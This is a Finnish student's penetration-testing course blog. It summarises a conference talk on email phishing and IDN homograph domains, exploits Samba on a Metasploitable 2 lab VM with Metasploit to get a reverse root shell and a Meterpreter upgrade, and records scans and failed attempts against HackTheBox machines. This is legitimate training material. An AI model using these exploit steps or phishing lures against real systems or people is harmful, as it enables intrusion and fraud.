Penetration testing H5

a) Konfferenssi kotona. Katso jokin esitys pentest-aiheisesta konfferenssista ja kommentoi sen parhaita paloja. Esim. Disoebey, RSA, BlackHat…
b) Metasploitable. Korkkaa jokin uusi palvelu Metasploitablesta (jokin muu kuin vsftpd). Voit käyttää Metasploitable 2 tai 3.
c) HackTheBox, korkkaa jokin kone.

Tehtävät: http://terokarvinen.com/2019/penetration-testing-tunkeutumistestaus-ict4tn027-3004-intensive-summer-course-2019-w21w22-5-credits

Tässä blogissa käytetyt menetelmät ovat väärin käytettynä laittomia, käytä omalla vastuulla.

Tehtävät tehdään Kali Linux Xfce 64-Bit käyttöjärjestelmään, joka on avattu Live tilaan muistitikulta.

Tietojenkalastelu sähköpostitse – Nicolas Särökaari

Mikä on tietojen kalastelu

Tietokalastelu on yritys saada arkaluonteisia tietoja, kuten käyttäjätunnuksia, salasanoja ja luottokorttitietoja, peittämällä itsensä luotettavaksi tahoksi, joille ihmiset lähettäisivät tietojaan.

Miksi ihmiset napsauttavat linkkejä

  1. Uteliaisuudesta jos vaikka sähköpostissa lukee, että pakettisi saapuu 30.05.2019 ja et ole tilannut mitään.
  2. Tunnenko lähettäjän, jos vaikka Suomalaiselle lähetetyssä viestissä on suomalainen sukunimi, kuten Virtanen.

Laillisuus

Videossa Nicolas Särökaari mainitsee tietojen käytettävyyden laillisuudesta kohdassa: 04:28 “Data act in Finland actually gives quite good protection against for the users that we have to been doing phishing just due diligence that we have to do that we cannot actually provide any any real data that could be used against those users that actually click the link so only data that you can provide is basically anonymized so they cannot be used against people.” URL: (https://youtu.be/m9YFJGSHYtY?t=268).

Suojaus mekanismit

SPF Sender Policy Framework ja DKIM DomainKeys Indentified Mail: Tunnistaa Domain nimiä ja sähköpostin sisällön.

URL-white listing: Vain tietyt verkkotunnukset ovat sallittuja ja kaikki muu on estetty.

Graylisting: Torjuu uudet viestit lähettäjälle huonetta puolella voi myös estää oikeutetut sähköpostit.

Ohitusmekanismi: Mekanismit tarkistaa verkkotunnuksen Domain nimen maineen mukaan, Sähköpostin otsikot, sähköpostin sisältö ja päättää päästetäänkö sähköposti läpi. Järjestelmän voi kiertää esimerkiksi tekemällä uusia Domain nimiä ja lähettämällä viestit Suomeksi.

IDN Homograph -hyökkäys

Käyttäjän Unicodesta kirjaimia on saman näköisiä sivuja kuin alkuperäinen esim. Kreikan aakkoset “ρ” poe.trade -> ρoe.trade.

Kuva: Kokeilin NameCheap sivulta voiko Domainin ρoe.trade ostaa ja kyllä voi.

Mikä yleensä toimii tietojenkalastelussa

Sähköpostin lähettäminen palvelupisteeseen tai tietotekniikkaosastoon toimii erittäin hyvin ja muut hyvämaineiset myymälät kuten linkedin gmail apple.

Uteliaisuus: Esim. ”Tilaamasi paketti saapuu 30.05.2019”

Kiireellisyyden tunne: Esimerkki koulun sähköpostista ”Olet käyttänyt 98,9% postilaatikkoon osoitetusta datatilasta. Välttääksesi, että saapuvat hierontasi pidetään kiinni tai ne menettävät ne pysyvästi, sinun on tarkistettava postilaatikkoasi laajentaaksesi tietomäärän kokoa. Päivitä postilaatikko valitsemalla VALIDATE”.

Mitä hyötyä

Saada salaisia tietoja suoraan kohde organisaatiosta.

Lähde

Disobey 2018 – Phishing through email – Niklas Särökaari: https://www.youtube.com/watch?v=m9YFJGSHYtY

Metasploitable Vagrant

Asensin Vagrantin komennolla “apt-get install vagrant” ja VirtualBox:n komennolla “apt-get install virtualbox-qt“.

Tein suoraan VagrantCloud sivun käyttäjän rapid7:n komennoilla “vagrant init rapid7/metasploitable3-ub1404“, joka tekee Vagrantfilen ja komennolla “vagrant up“, joka tekee Vagrantfilen mukaan VirtualBoxille virtuaali- koneen. En saanut tätä virtuaali- konetta toimimaan. Löysin vielä opettajan ohjeen tähän samaan koneeseen, mutta sekään ei toiminut.

Aloitin kokeilemaan toista VagrantClouidin käyttäjän Sliim VagrantCloud Metasploitable 2 virtuaali konetta Vagrant Cloudista komennoilla “vagrant init Sliim/metasploitable2 –box-version 2“, lisäsin tiedostoon vielä opetajan sivulta saamani rivit “config.vm.network “private_network”, :type => ‘dhcp’, :adapter => 1“, jotta saan Virtualbox:n erilliseen verkkoon ja komennolla “vagrant up“, tämä virtuaali kone asentui ongelmitta.

Katsoin komennolla “ip route” uuden verkon local osoitteen, joka oli 172.28.128.0/24 nimellä vboxnet0. Komennolla “apt-get install ipcalc” asensin ohjelman, jolla voidaan saada lisätietoa verkon laajuudesta, jos ei sitä tunnista osoitteesta eli komennolla ipcalc 172.28.128.0/24.

Netmaskista 255.255.255.0 voidaan päätellä että, viimeisellä numerolla on liikkuma varaa eli verkon laajuus 172.28.128.1 – 172.28.128.254.

Verkon skannaus

Aloitin alustamalla Metasploit ohjelmaan tietokannan, johon skannaus tiedot tulevat komennolla “msfdb init” ja avasin MetaSploit:n komennolla “msfconsole“.

Skannasin ensin pienen palan verkkoa koska todennäköisesti VirtualBox laitaa koneen local IP avaruuden alkupäähän eli komennolla “db_nmap -n -vvv 172.28.128.1-10 –top-ports 10“, skannasin 10 ensimmäistä IP osoitetta ja etsin top-10 yleisimmillä porteilla. Komennolla services –up sain perus tiedot selville

host ip: 172.28.128.3.

Avonaiset portit: 21tcp, 22tcp , 23tcp, 25tcp, 80tcp, 139tcp ja 445tcp.

Palveluiden nimet: Ftp, SSH, Telnet, Smtp, HTTP, Netbios-Ssn ja Microsoftds.

Suoritin vielä tarkemman skannauksen, että saan versiotietoja ja kaikki avonaiset portit komennolla “db_nmap -n -sC -sV -Pn 172.28.128.3” eli lipulla sC sripti skannaus, lipulla -sV banner grabbing ja lipulla -Pn no ping skannaus. Komennolla services –up sain kaikki palvelut näkyviin syöte alla.

host          port  proto  name         state  info
 ----          ----  -----  ----         -----  ----
 172.28.128.3  21    tcp    ftp          open   vsftpd 2.3.4
 172.28.128.3  22    tcp    ssh          open   OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
 172.28.128.3  23    tcp    telnet       open   Linux telnetd
 172.28.128.3  25    tcp    smtp         open   Postfix smtpd
 172.28.128.3  53    tcp    domain       open   ISC BIND 9.4.2
 172.28.128.3  80    tcp    http         open   Apache httpd 2.2.8 (Ubuntu) DAV/2
 172.28.128.3  111   tcp    rpcbind      open   2 RPC #100000
 172.28.128.3  139   tcp    netbios-ssn  open   Samba smbd 3.X - 4.X workgroup: WORKGROUP
 172.28.128.3  445   tcp    netbios-ssn  open   Samba smbd 3.0.20-Debian workgroup: WORKGROUP
 172.28.128.3  512   tcp    exec         open   netkit-rsh rexecd
 172.28.128.3  513   tcp    login        open   
 172.28.128.3  514   tcp    shell        open   Netkit rshd
 172.28.128.3  1099  tcp    java-rmi     open   Java RMI Registry
 172.28.128.3  1524  tcp    bindshell    open   Metasploitable root shell
 172.28.128.3  2049  tcp    nfs          open   2-4 RPC #100003
 172.28.128.3  2121  tcp    ftp          open   ProFTPD 1.3.1
 172.28.128.3  3306  tcp    mysql        open   MySQL 5.0.51a-3ubuntu5
 172.28.128.3  5432  tcp    postgresql   open   PostgreSQL DB 8.3.0 - 8.3.7
 172.28.128.3  5900  tcp    vnc          open   VNC protocol 3.3
 172.28.128.3  6000  tcp    x11          open   access denied
 172.28.128.3  6667  tcp    irc          open   UnrealIRCd
 172.28.128.3  8009  tcp    ajp13        open   Apache Jserv Protocol v1.3
 172.28.128.3  8180  tcp    http         open   Apache Tomcat/Coyote JSP engine 1.1

Suoritin vielä tarkemman skannauksen osoitteeseen 172.28.128.3 MetaSploit:n ulkopuolella, että saan muistion ohjelmisto versioista. Tein ensin teksti tiedoston “3portscan.txt” ja komennolla “nmap -n -sV -sC 172.28.128.3 | tee 3portscan.txt” skannasin portit, lipulla -sV suoritin banner grabing toimintoa, joka hakee ohjelmisto versioita ja lipulla -sC tein skripti skannauksen, jolla saan vielä enemmän tietoa järjestelmästä. Skannauksen tulos alla.

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-26 07:32 UTC
 Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
 Service scan Timing: About 43.48% done; ETC: 07:32 (0:00:08 remaining)
 Nmap scan report for 172.28.128.3
 Host is up (0.00012s latency).
 Not shown: 977 closed ports
 PORT     STATE SERVICE     VERSION
 21/tcp   open  ftp         vsftpd 2.3.4
 |ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst:  |   STAT:  | FTP server status: |      Connected to 172.28.128.1 |      Logged in as ftp |      TYPE: ASCII |      No session bandwidth limit |      Session timeout in seconds is 300 |      Control connection is plain text |      Data connections will be plain text |      vsFTPd 2.3.4 - secure, fast, stable |_End of status 22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey:  |  1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
 23/tcp   open  telnet      Linux telnetd
 25/tcp   open  smtp        Postfix smtpd
 |smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,  |_ssl-date: 2019-05-26T07:32:41+00:00; -1s from scanner time. | sslv2:  |   SSLv2 supported |   ciphers:  |     SSL2_RC4_128_WITH_MD5 |     SSL2_DES_64_CBC_WITH_MD5 |     SSL2_DES_192_EDE3_CBC_WITH_MD5 |     SSL2_RC2_128_CBC_WITH_MD5 |     SSL2_RC4_128_EXPORT40_WITH_MD5 |    SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
 53/tcp   open  domain      ISC BIND 9.4.2
 | dns-nsid: 
 |_  bind.version: 9.4.2
 80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
 |http-server-header: Apache/2.2.8 (Ubuntu) DAV/2 |_http-title: Metasploitable2 - Linux 111/tcp  open  rpcbind     2 (RPC #100000) | rpcinfo:  |   program version   port/proto  service |   100000  2            111/tcp  rpcbind |   100000  2            111/udp  rpcbind |   100003  2,3,4       2049/tcp  nfs |   100003  2,3,4       2049/udp  nfs |   100005  1,2,3      43327/udp  mountd |   100005  1,2,3      60161/tcp  mountd |   100021  1,3,4      36359/udp  nlockmgr |   100021  1,3,4      42018/tcp  nlockmgr |   100024  1          47265/udp  status |  100024  1          50493/tcp  status
 139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
 445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
 512/tcp  open  exec        netkit-rsh rexecd
 513/tcp  open  login
 514/tcp  open  shell       Netkit rshd
 1099/tcp open  java-rmi    Java RMI Registry
 1524/tcp open  bindshell   Metasploitable root shell
 2049/tcp open  nfs         2-4 (RPC #100003)
 2121/tcp open  ftp         ProFTPD 1.3.1
 3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
 | mysql-info: 
 |   Protocol: 10
 |   Version: 5.0.51a-3ubuntu5
 |   Thread ID: 8
 |   Capabilities flags: 43564
 |   Some Capabilities: Support41Auth, SupportsTransactions, LongColumnFlag, SwitchToSSLAfterHandshake, Speaks41ProtocolNew, SupportsCompression, ConnectWithDatabase
 |   Status: Autocommit
 |_  Salt: wW,t(fIxE.VF>Ajs&`0n
 5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
 |ssl-date: 2019-05-26T07:32:41+00:00; -2s from scanner time. 5900/tcp open  vnc         VNC (protocol 3.3) | vnc-info:  |   Protocol version: 3.3 |   Security types:  |    VNC Authentication (2)
 6000/tcp open  X11         (access denied)
 6667/tcp open  irc         UnrealIRCd
 8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
 |_ajp-methods: Failed to get a valid response for the OPTION request
 8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
 |_http-favicon: Apache Tomcat
 |_http-server-header: Apache-Coyote/1.1
 |_http-title: Apache Tomcat/5.5
 MAC Address: 08:00:27:E1:7D:3B (Oracle VirtualBox virtual NIC)
 Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
 Host script results:
 |clock-skew: mean: 1h19m58s, deviation: 2h18m34s, median: -1s |_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: , NetBIOS MAC:  (unknown) | smb-os-discovery:  |   OS: Unix (Samba 3.0.20-Debian) |   NetBIOS computer name:  |   Workgroup: WORKGROUP\x00 |  System time: 2019-05-26T03:32:41-04:00
 |_smb2-time: Protocol negotiation failed (SMB2)

Skannauksen tuloksena löytyi vaikka mitä esim. VsFtpd 2.3.4, jolla kokeilin päästä sisään ja pääsin mutta tässä tehtävässä piti tehdä jokin muu kuin Ftp.

Penetration test 172.28.128.3

Katsoin teksti tiedostoa 3portscan.txt ja löysin tarkemman versio numeron Sambasta, jolla on avonainen portti 445 “Samba smbd 3.0.20-Debian”, etsin kyseistä versio numeroa SearchSploitista komennolla “searchsploit -w samba 3.0.20“, joka näyttää myös versio numerot ja websivun, josta lukea lisätietoja. Löysin explotin jossa oli sama versio numero kuin skannaamassani koneessa “Samba 3.0.20 < 3.0.25rc3 – ‘Username’ map script’ Command Execution (Metasploit)” ja exploit näyttäisi olevan Metasploitissa.

MetaSploitissa komennolla “set RHOSTS 172.28.128.3” laitoin maalitaulu osoitteen, komenolla “search samba” etsin kyseisen explotin löytyi nimellä “exploit/multi/samba/usermap_script – 2007-05-14 – excellent – Samba “username map script” Command Execution” ja laitoin haavoituvuuden käyttöön komennolla “use exploit/multi/samba/usermap_script“. ExploitDB sivun mukaan tällä pitäisi jo päästä suorittamaan komentoja palvelimelle eli seuraavaksi kokeilu.

MetaSploit oletus arvoisesti valitsee toimivan vaihto ehdon hyötykuormalle, katsoin “options” komennolla että sielä oli “cmd/unix/reverse”. Komennolla “exploit” lähetin hyötykuorman, joka ilmoitti “Command shell session 1 opened (172.28.128.1:4444 -> 172.28.128.3:47919) at 2019-05-26 09:25:28 +0000” eli pääsin sisälle koneeseen. Kokeilin vielä terminaali komennolla “w” joka vastasi.

w
05:52:19 up  2:53,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    :0.0             02:58    2:53   0.00s  0.00s -bash

Upgrade Shell

Laitoin koneen, jonka sain auki taustalle komennolla “background“, valitsin kyseisen session 1 komennolla “set SESSION 1“, etsin kyseiseen sessioon ylennys mahdollisuutta komennolla “search upgrades” ja valitsin uudeksi Shelliksi Meterpreter eli komennolla “use post/multi/manage/shell_to_meterpreter” valitsin kansion nimen mukaan. Komennolla exploit lähetin POST pyynnön sessiolle 1, joka vastasi toiminnon onnistuneen.

[*] Upgrading session ID: 1 [] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.28.128.1:4433  [] Sending stage (914728 bytes) to 172.28.128.3
[*] Meterpreter session 2 opened (172.28.128.1:4433 -> 172.28.128.3:48622) at 2019-05-26 10:01:13 +0000 [] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed

Kokeilin vielä toimivuuden komennolla “sessions 2“, jonka juuri loin –> pääsin sisään ja syötin komennon “ls“, joka toimi oletetusti.

meterpreter > ls
 Listing: /
 Mode              Size     Type  Last modified              Name
 ----              ----     ----  -------------              ----
 40755/rwxr-xr-x   4096     dir   2012-05-14 03:35:33 +0000  bin
 40755/rwxr-xr-x   1024     dir   2012-05-14 03:36:28 +0000  boot
 40755/rwxr-xr-x   4096     dir   2010-03-16 22:55:51 +0000  cdrom

Lopuksi tuhosin vagrant koneen komennolla “vagrant destroy“.

HackTheBoxEu

Tehtävä ei sisällä vastauksia HackTheboxiin.

Liityin HackTheBoxin lähiverkkoon lataamalla HackTheBoxin sivulta nimi.ovpn tiedoston, lataamalla Open-Vpn paketin hallinnasta komennolla “apt-get install openvpn” ja avaamalla lataamani tiedoston Open-Vpn:n kautta komennolla “openvpn nimi.ovpn“.

Komennolla “ip route” katsoin verkon, joka oli HackTheBoxin Scopessa eli 10.10.10.0/24. Latasin ipcalc ohjelman komennolla “apt-get install ipcalc” ja komennolla “ipcalc 10.10.10.0/24“, tarkastan verkon laajuudeen.

Netmaskista 255.255.255.0 voidaan todeta, että viimeisellä numerolla on liikkuma varaa eli olen scoupin mukaisessa verkossa 10.10.10.1 – 10.10.10.254.

Kohteen valinta

Ensin alustin MetaSploit:n tietokannat komennolla “msfdb init“, joka tekee tietokannat, johon esim. Portti skannauksien tulokset, jotka alkaa db_.. menevät. Päivitin viellä exploit versiot MetaSploitille komennolla “apt-get install metasploit-framework“, joka ilmoitti 1 upgraded. Avasin MetaSploit:n komennolla “msfconsole“.

Sain torstaina tuon helpoimman auki eli 10.10.10.152 käyttäjällä ja rootilla eli kokeilen, muita kun tätä.

MetaSploisissa komennolla “db_nmap -vvv -n 10.10.10.100-200 -sV –top-ports 15” sain skannatua alueen 100-200, banner gräbilla ja top 15porteilla.

MetaSploitissa sain komennolla “services –up” auki kaikki skannaamani tiedot suoraan paikallisesta msf tietokannasta.

Services
 host          port  proto  name          state  info
 ----          ----  -----  ----          -----  ----
 10.10.10.101  22    tcp    ssh           open   OpenSSH 7.6p1 Ubuntu 4ubuntu0.1 Ubuntu Linux; protocol 2.0
 10.10.10.101  80    tcp    http          open   Apache httpd 2.4.29 (Ubuntu)
 10.10.10.101  8080  tcp    http          open   Apache Tomcat/Coyote JSP engine 1.1
 10.10.10.103  21    tcp    ftp           open   Microsoft ftpd
 10.10.10.103  53    tcp    domain        open   
 10.10.10.103  80    tcp    http          open   Microsoft IIS httpd 10.0
 10.10.10.103  135   tcp    msrpc         open   Microsoft Windows RPC
 10.10.10.103  139   tcp    netbios-ssn   open   Microsoft Windows netbios-ssn
 10.10.10.103  443   tcp    ssl/http      open   Microsoft IIS httpd 10.0
 10.10.10.103  445   tcp    microsoft-ds  open   
 10.10.10.119  22    tcp    ssh           open   OpenSSH 7.4 protocol 2.0
 10.10.10.119  80    tcp    http          open   Apache httpd 2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
 10.10.10.120  80    tcp    http          open   Apache httpd 2.4.34 (Ubuntu)
 10.10.10.120  110   tcp    pop3          open   Dovecot pop3d
 10.10.10.120  143   tcp    imap          open   Dovecot imapd Ubuntu
 10.10.10.121  22    tcp    ssh           open   OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 Ubuntu Linux; protocol 2.0
 10.10.10.121  80    tcp    http          open   Apache httpd 2.4.18 (Ubuntu)
 10.10.10.122  22    tcp    ssh           open   OpenSSH 7.4 protocol 2.0
 10.10.10.122  80    tcp    http          open   Apache httpd 2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
 10.10.10.123  21    tcp    ftp           open   vsftpd 3.0.3
 10.10.10.123  22    tcp    ssh           open   OpenSSH 7.6p1 Ubuntu 4 Ubuntu Linux; protocol 2.0
 10.10.10.123  53    tcp    domain        open   ISC BIND 9.11.3-1ubuntu1.2 Ubuntu Linux
 10.10.10.123  80    tcp    http          open   Apache httpd 2.4.29 (Ubuntu)
 10.10.10.123  139   tcp    netbios-ssn   open   Samba smbd 3.X - 4.X workgroup: WORKGROUP
 10.10.10.123  443   tcp    ssl/http      open   Apache httpd 2.4.29
 10.10.10.123  445   tcp    netbios-ssn   open   Samba smbd 3.X - 4.X workgroup: WORKGROUP
 10.10.10.124  22    tcp    ssh           open   
 10.10.10.124  80    tcp    http          open   nginx
 10.10.10.124  443   tcp    ssl/http      open   nginx
 10.10.10.124  8080  tcp    ssl/http      open   nginx
 10.10.10.125  135   tcp    msrpc         open   Microsoft Windows RPC
 10.10.10.125  139   tcp    netbios-ssn   open   Microsoft Windows netbios-ssn
 10.10.10.125  445   tcp    microsoft-ds  open   
 10.10.10.126  80    tcp    http          open   nginx 1.10.3
 10.10.10.126  443   tcp    ssl/http      open   nginx 1.10.3
 10.10.10.127  22    tcp    ssh           open   OpenSSH 7.9 protocol 2.0
 10.10.10.127  80    tcp    http          open   OpenBSD httpd
 10.10.10.127  443   tcp    ssl/https     open   
 10.10.10.128  80    tcp    http          open   Microsoft IIS httpd 10.0
 10.10.10.129  22    tcp    ssh           open   OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 Ubuntu Linux; protocol 2.0
 10.10.10.129  80    tcp    http          open   Apache httpd 2.4.29 (Ubuntu)
 10.10.10.130  80    tcp    http          open   Microsoft IIS httpd 10.0
 10.10.10.130  135   tcp    msrpc         open   Microsoft Windows RPC
 10.10.10.130  139   tcp    netbios-ssn   open   Microsoft Windows netbios-ssn
 10.10.10.130  445   tcp    microsoft-ds  open   
 10.10.10.130  8080  tcp    http          open   Apache Tomcat 8.5.37
 10.10.10.131  21    tcp    ftp           open   vsftpd 2.3.4
 10.10.10.131  22    tcp    ssh           open   OpenSSH 7.9 protocol 2.0
 10.10.10.131  80    tcp    http          open   Node.js Express middleware
 10.10.10.131  443   tcp    ssl/http      open   Node.js Express framework
 10.10.10.132  135   tcp    msrpc         open   Microsoft Windows RPC
 10.10.10.132  445   tcp    microsoft-ds  open   
 10.10.10.132  8080  tcp    http-proxy    open   -
 10.10.10.133  22    tcp    ssh           open   OpenSSH 7.4p1 Debian 10+deb9u6 protocol 2.0
 10.10.10.133  80    tcp    http          open   Apache httpd 2.4.25 (Debian)
 10.10.10.134  22    tcp    ssh           open   OpenSSH for_Windows_7.9 protocol 2.0
 10.10.10.134  135   tcp    msrpc         open   Microsoft Windows RPC
 10.10.10.134  139   tcp    netbios-ssn   open   Microsoft Windows netbios-ssn
 10.10.10.134  445   tcp    microsoft-ds  open   Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
 10.10.10.139  22    tcp    ssh           open   OpenSSH 7.6p1 Ubuntu 4 Ubuntu Linux; protocol 2.0
 10.10.10.139  80    tcp    http          open   nginx 1.14.0 Ubuntu
 10.10.10.140  22    tcp    ssh           open   OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 Ubuntu Linux; protocol 2.0
 10.10.10.140  80    tcp    http          open   Apache httpd 2.4.18 (Ubuntu)
 10.10.10.152  21    tcp    ftp           open   Microsoft ftpd
 10.10.10.152  80    tcp    http          open   Indy httpd 18.1.37.13946 Paessler PRTG bandwidth monitor
 10.10.10.152  135   tcp    msrpc         open   Microsoft Windows RPC
 10.10.10.152  139   tcp    netbios-ssn   open   Microsoft Windows netbios-ssn
 10.10.10.152  445   tcp    microsoft-ds  open   Microsoft Windows Server 2008 R2 - 2012 microsoft-ds

Kokeilin osoitteeseen 131 palvelimeen vsftpd 2.3.4, exploittia ja payloadia, mutta ei toiminut, varmaan eri versio kuin nmap portti skannaus ehdottaa. En tiedä mitään Node.jstä niin vaihdoin kohdetta.

Kokeilin saada Magenton kauppa palvelua ylläpitävää 10.10.10.140/ auki monta tuntia enkä saanut. Kokeilin mm. Tarkempaa portti skannausta, DIRB Web content scanneria, exploitteja, hyötykuormia, SQL injectiota.. Löysin hyötykuorman, joka saattaisi toimia mutta se oli koodattu Pythonilla enkä saanut lisättyä sitä MetaSploitiin. Vaihdoin tässä vaiheessa virkistyksen vuoksi kohdetta.

Palvelimelta 10.10.10.121 sain selville DIRB skannauksella, että se hostaa osoitteessa 10.10.10.121/support/ HelpDeskZ ohjelmistoa. Sain myös selville, että kyseisessä palvelun versiossa voi lähettää php tiedostoja “submit a ticket” osiossa lähettämällä, jotain muuta ensin esim kuva.jpg tiedoston ja interceptillä vaihtaa kuvan kuva.php tiedostoon. En saanut ajan puitteissa toimimaan ja MitmProxyllä tämä ei onnistunut pitää varmaan käyttää, jotain muuta kuten Burpsuitea jota en vielä osaa käyttää. Hyöty kuorma sivulta: https://www.exploit-db.com/exploits/41200/ eli searchsplotista.

Vaikka vaihtelen kohteita pidän kirjaa kaikista portti skannauksista, DIRB skannauksista ja havainnoista.

Lähteet

Pohjana Tero Karvinen 2019: Penetration Testing kurssi, http://terokarvinen.com

Tehtävät:  http://terokarvinen.com/2019/penetration-testing-tunkeutumistestaus-ict4tn027-3004-intensive-summer-course-2019-w21w22-5-credits

Vagrant Virtuaali kone: https://app.vagrantup.com/rapid7/boxes/metasploitable3-ub1404

Vagrant Virtuaali kone2: https://app.vagrantup.com/Sliim/boxes/metasploitable2

Samba exploit: https://www.exploit-db.com/exploits/16320

Disobey 2018 – Phishing through email – Niklas Särökaari: https://www.youtube.com/watch?v=m9YFJGSHYtY

Penetration testing H4

a) Hedelmiä matalalla. Mitkä vaikuttavat HackTheBoxin helpoimmilta kohteilta? Tiedustele HackTheBox-verkko esimerkiksi porttiskannerilla ja ryömijällä. Noudata Rules-kohdassa annettua scopea.

Tehtävät: http://terokarvinen.com/2019/penetration-testing-tunkeutumistestaus-ict4tn027-3004-intensive-summer-course-2019-w21w22-5-credits

Tässä blogissa käytetyt menetelmät ovat väärin käytettynä laittomia, käytä omalla vastuulla.

Tehtävät tehdään Kali Linux Xfce 64-Bit käyttöjärjestelmään, joka on avattu Live tilaan muistitikulta.

HackTheBox Eu verkon tiedustelu

Liityin HackTheBoxin lähiverkkoon lataamalla HackTheBoxin sivulta nimi.ovpn tiedoston, lataamalla Open-Vpn paketin hallinnasta komennolla “apt-get install openvpn” ja avaamalla lataamani tiedoston Open-Vpn:n kautta komennolla “openvpn nimi.ovpn“.

MetaSploit5

Kali Linuxilla on valmiiksi asennettu MetaSploit5 eli alustin sen ensin komennolla “msfdb init“, joka tekee tietokantoja, johon sijoitetaan tietoja skannauksista. MetaSploitin sain auki komennolla “msfconsole“.

Nmap MetaSploitissa

Sallituksi IP alueeksi HackTheBoxEu on rajannut säännön 2 mukaan: 10.10.10.1 – 10.10.10.254.

Aloitin skannaamaan aluetta Nmapilla komennolla “db_nmap 10.10.10.1-254 -n –top-ports 15“, Skannaa koko alueen portit ja lisää ne MetaSploit:n tietokantaa, ettei tarvitse enää skannata uudestaan ja etuliite db vie tiedot tietokantaan, -n lippu man sivulta “Never do DNS resolution” ja –top-ports 15 man sivulta “Scan <15> most common ports”.

Komennolla “services –up” sain skannatut avonaiset portit listattua MetaSloit:n tietokannasta, lippu –up poistaa turhat portit, jotka eivät ole auki.

host          port  proto  name           state  info
 ----          ----  -----  ----           -----  ----
 10.10.10.101  22    tcp    ssh            open   
 10.10.10.101  80    tcp    http           open   
 10.10.10.101  8080  tcp    http-proxy     open   
 10.10.10.103  21    tcp    ftp            open   
 10.10.10.103  53    tcp    domain         open   
 10.10.10.103  80    tcp    http           open   
 10.10.10.103  135   tcp    msrpc          open   
 10.10.10.103  139   tcp    netbios-ssn    open   
 10.10.10.103  443   tcp    https          open   
 10.10.10.103  445   tcp    microsoft-ds   open   
 10.10.10.119  22    tcp    ssh            open   
 10.10.10.119  80    tcp    http           open   
 10.10.10.120  80    tcp    http           open   
 10.10.10.120  110   tcp    pop3           open   
 10.10.10.120  143   tcp    imap           open   
 10.10.10.121  22    tcp    ssh            open   
 10.10.10.121  80    tcp    http           open   
 10.10.10.122  22    tcp    ssh            open   
 10.10.10.122  80    tcp    http           open   
 10.10.10.123  21    tcp    ftp            open   
 10.10.10.123  22    tcp    ssh            open   
 10.10.10.123  53    tcp    domain         open   
 10.10.10.123  80    tcp    http           open   
 10.10.10.123  139   tcp    netbios-ssn    open   
 10.10.10.123  443   tcp    https          open   
 10.10.10.123  445   tcp    microsoft-ds   open   
 10.10.10.124  22    tcp    ssh            open   
 10.10.10.124  80    tcp    http           open   
 10.10.10.124  443   tcp    https          open   
 10.10.10.124  8080  tcp    http-proxy     open   
 10.10.10.125  135   tcp    msrpc          open   
 10.10.10.125  139   tcp    netbios-ssn    open   
 10.10.10.125  445   tcp    microsoft-ds   open   
 10.10.10.126  80    tcp    http           open   
 10.10.10.126  443   tcp    https          open   
 10.10.10.127  22    tcp    ssh            open   
 10.10.10.127  80    tcp    http           open   
 10.10.10.127  443   tcp    https          open   
 10.10.10.128  80    tcp    http           open   
 10.10.10.129  22    tcp    ssh            open   
 10.10.10.129  80    tcp    http           open   
 10.10.10.130  80    tcp    http           open   
 10.10.10.130  135   tcp    msrpc          open   
 10.10.10.130  139   tcp    netbios-ssn    open   
 10.10.10.130  445   tcp    microsoft-ds   open   
 10.10.10.130  8080  tcp    http-proxy     open   
 10.10.10.131  21    tcp    ftp            open   
 10.10.10.131  22    tcp    ssh            open   
 10.10.10.131  80    tcp    http           open   
 10.10.10.131  443   tcp    https          open   
 10.10.10.132  135   tcp    msrpc          open   
 10.10.10.132  445   tcp    microsoft-ds   open   
 10.10.10.132  8080  tcp    http-proxy     open   
 10.10.10.133  22    tcp    ssh            open   
 10.10.10.133  80    tcp    http           open   
 10.10.10.134  22    tcp    ssh            open   
 10.10.10.134  135   tcp    msrpc          open   
 10.10.10.134  139   tcp    netbios-ssn    open   
 10.10.10.134  445   tcp    microsoft-ds   open   
 10.10.10.139  22    tcp    ssh            open   
 10.10.10.139  80    tcp    http           open   
 10.10.10.140  22    tcp    ssh            open   
 10.10.10.140  80    tcp    http           open   
 10.10.10.152  21    tcp    ftp            open   
 10.10.10.152  135   tcp    msrpc          open   
 10.10.10.152  139   tcp    netbios-ssn    open   
 10.10.10.152  445   tcp    microsoft-ds   open   
 10.10.10.152  3389  tcp    ms-wbt-server  open 

Porttien avonaisuudesta voin päätellä mitä palveluita palvelimelta löytyy ja myöhemmin kun hankin tarkempaa tietoa tietyistä koneista voin skannata myös porteista muuta hyödyllistä esim. Ohjelmien versio tietoja.

EyeWitness

Ohjelmalla EyeWitness lisätietoja palvelimista. Ohjelmisto selaa index.html tietoja IP alueelta ja ottaa kuvia etusivusta. Asensin EyeWitness:in komennolla “apt-get install eyewitness” ja tein kansion eyes valmiiksi koti hakemistoon komennolla “mkdir eyes“.

